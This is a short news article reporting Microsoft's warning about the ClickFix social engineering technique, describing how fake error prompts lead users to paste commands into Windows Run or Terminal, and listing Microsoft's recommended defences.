Microsoft recently issued a warning about the rise of a social engineering attack called ClickFix. Traditional anti-phishing methods are not enough to protect against this new style of attack. The ClickFix social engineering strategy has been gaining popularity among cybercriminals in recent times.
According to Microsoft, this was seen in 47% of initial access method attacks. The main defense against this cyber attack is for users to change their behavior to avoid this cyber attack, which traditional phishing protection methods do not work.
What is ClickFix?
ClickFix is a social engineering method that takes advantage of human nature to solve problems. It displays fake error messages, prompting users to copy and paste code or launch commands to fix a minor technical issue on their system.
According to Microsoft, ClickFix tricks users into copying a command (sometimes embedded in a fake pop-up, job application, or support message) and pasting it into the Windows Run dialog (Win + R) or Terminal.
Severity of the attack
It is a 'clean, fileless process', which is often invisible to traditional security tools. According to Microsoft, ClickFix was the most common initial access method recorded through Microsoft Defender Expert Alerts last year, accounting for 47% of all attacks.
Clickfix techniques are being used by both cybercriminals and nation-state-level threat actors. Successful attacks have included payloads such as Lumma stealer, XWorm, AsyncRAT, VenomRAT, Danabot, and NetSupport RAT. Successful attacks have reportedly resulted in credential theft, malware staging, and persistent access using a few keystrokes on the user.
Security and Prevention
Microsoft also recommends implementing PowerShell logging to track potential ClickFix scams, monitoring clipboard-to-terminal activities, and using browser hardening and contextual detection systems to catch suspicious activity before the attack is successful.
How did you feel after reading this article?
Related Posts
Recent Posts
